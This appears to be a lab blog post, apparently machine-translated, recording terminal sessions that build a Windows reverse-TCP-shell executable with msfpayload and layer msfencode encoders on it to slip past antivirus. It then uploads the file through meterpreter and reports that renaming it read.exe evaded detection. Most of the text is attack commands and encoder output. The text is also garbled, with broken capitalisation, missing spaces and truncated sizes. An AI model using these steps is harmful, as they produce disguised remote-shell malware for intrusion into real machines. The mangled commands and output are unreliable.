root@bt:~# msfpayload windows/shell_reverse_tcp lhost=192.168.1.11 lport=31337 R | MSFENCODE-E x86/shikata_ga_nai-c 5-t Raw | MSFENCODE-E x86/alpha_upper-c 2-t Raw | MSFENCODE-E x86/shikata_ga_nai-c 5-t Raw | Msfencode-e x86/countdown-c 5-t exe-o payload3.exe [*] X86/shikata_ga_nai succeeded with size 341 (iteration=1) [*] X 86/shikata_ga_nai succeeded with size 368 (iteration=2) [*] X86/shikata_ga_nai succeeded with size 395 (iteration=3) [*] X86/shikata_ga_nai succeeded with size 422 (iteration=4) [*] X86/shikata_ga_nai succeeded with size 449 (iteration=5) [ *] X86/alpha_upper succeeded with size 967 (iteration=1) [*] X86/alpha_upper succeeded with size 2003 (iteration=2) [*]
X86/shikata_ga_nai succeeded with size 2032 (iteration=1) [*] X86/shikata_ga_nai succeeded with size 2061 (iteration=2) [*] X86/shikata_ga_nai succeeded with size 2090 (iteration=3) [*] X86/shikata_ga_nai succeeded with size 2119 (iteration= 4) [*] X86/shikata_ga_nai succeeded with size 2148 (iteration=5) [*] X86/countdown succeeded with size 2166 (iteration=1) [*] X86/countdown succeeded with size 2184 (ite ration=2) [*] X86/countdown succeeded with size 2202 (iteration=3) [*] X86/countdown succeeded with size 2220 (iteration =4) [*] X86/countdown succeeded with size 2238 (iteration=5) root@bt:~# ls Desktop payload1.exe payload2.exe payload3 . exe root@bt:~# file Payload3.exe payload3.exe:PE32 executable for MS Windows (GUI) Intel 80386 32-bit root@bt:~#
Generating Payload3.exe took a long time, about half an hour, probably because of the virtual machine, memory only 512MB.
Then, uploading to XP will still report a threat:
Meterpreter > Upload Payload3.exe
[*] uploading : Payload3.exe, Payload3.exe
[*] uploaded : Payload3.exe, Payload3.exe
meterpreter >
The book is written about the success of the anti-virus software, but, I here, or report a threat, perhaps because the antivirus software compared to the new bar.
Later, the second time, I generated the payload.exe, it is faster, do not know why.
root@bt:~# time Msfpayload windows/shell_reverse_tcp lhost=192.168.1.11 lport=31337 R | MSFENCODE-E x86/shikata_ga_nai-c 5-t Raw | MSFENCODE-E x86/alpha_upper-c 2-t Raw | MSFENCODE-E x86/shikata_ga_nai-c 5-t Raw | Msfencode-e x86/countdown-c 5-t exe-o payload_time.exe [*] X86/shikata_ga_nai succeeded with size 341 (iteration=1) [
*] X86/shikata_ga_nai succeeded with size 368 (iteration=2) [*] X86/shikata_ga_nai succeeded with size 395 (iteration=3) [*] X86/shikata_ga_nai succeeded with size 422 (iteration=4) [*] X86/shikata_ga_nai succeeded with size 449 (iteration=5
) [*] X86/alpha_upper succeeded with size 966 (iteration=1) [*] X86/alpha_upper succeeded with size (iteration=2) [*] X86/shikata_ga_nai succeeded with size 2029 (iteration=1) [*] X86/shikata_ga_nai succeeded with size 2058 (iteration= 2) [*] X86/shikata_ga_nai succeeded with size 2087 (iteration=3) [*] X86/shikata_ga_nai succeeded with size 2116 (Iterat ION=4) [*] X86/shikata_ga_nai succeeded with Size 2145 (iteration=5) [*] X86/countdown succeeded with size 2163 (iteration=1) [*] X86/countdown succeeded with size 2181 (iteration=2) [*] X86/countdown succeeded with size 2199 (iteration=3) [*] X86/countdown succeeded with size 2217 ( ITERATION=4) [*] X86/countdown succeeded with size 2235 (iteration=5) real 1m34.085s user 0m50.987s sys 0m40. 059s root@bt:~#
However, in XP, the threat is still reported.
Then, I think, is not because EXE filename problem, so, generated a very normal name Readme.exe, this time, unexpectedly escaped from the AVG antivirus software Avira.
root@bt:~# time Msfpayload windows/shell_reverse_tcp lhost=192.168.1.11 lport=31337 R | MSFENCODE-E x86/shikata_ga_nai-c 5-t Raw | MSFENCODE-E x86/alpha_upper-c 2-t Raw | MSFENCODE-E x86/shikata_ga_nai-c 5-t Raw | Msfencode-e x86/countdown-c 5-t exe-o read.exe [*] X86/shikata_ga_nai succeeded with size 341 (iteration=1) [*] x86/s Hikata_ga_nai succeeded with size 368 (iteration=2) [*] X86/shikata_ga_nai succeeded with size 395 (iteration=3) [*] x86 /shikata_ga_nai succeeded with size 422 (iteration=4) [*] X86/shikata_ga_nai succeeded with size 449 (iteration=5) [*] X 86/alpha_upper succeeded with size 966 (iteration=1) [*] X86/alpha_upper succeeded with size (iteration=2) [*] x86/ Shikata_ga_nai succeeded with size 2029 (iteration=1) [*] X86/shikata_ga_nai succeeded with size 2058 (iteration=2) [*]
X86/shikata_ga_nai succeeded with size 2087 (iteration=3) [*] X86/shikata_ga_nai succeeded with size 2116 (iteration=4) [*] X86/shikata_ga_nai succeeded with size 21(iteration=5) [*] X86/countdown succeeded with size 2163 (iteration=1) [*] X86/countdown succeeded with size 2181 (it eration=2) [*] X86/countdown succeeded with size 2199 (iteration=3) [*] X86/countdown succeeded with size 2217 (iteratio N=4) [*] X86/countdown succeeded with size 2235 (iteration=5) real 1m33.468s user 0m52.195s sys 0m39.830s Roo t@bt:~#
Meterpreter > Upload Read.exe
[*] uploading : Read.exe, Read.exe
[*] uploaded : read.exe, re Ad.exe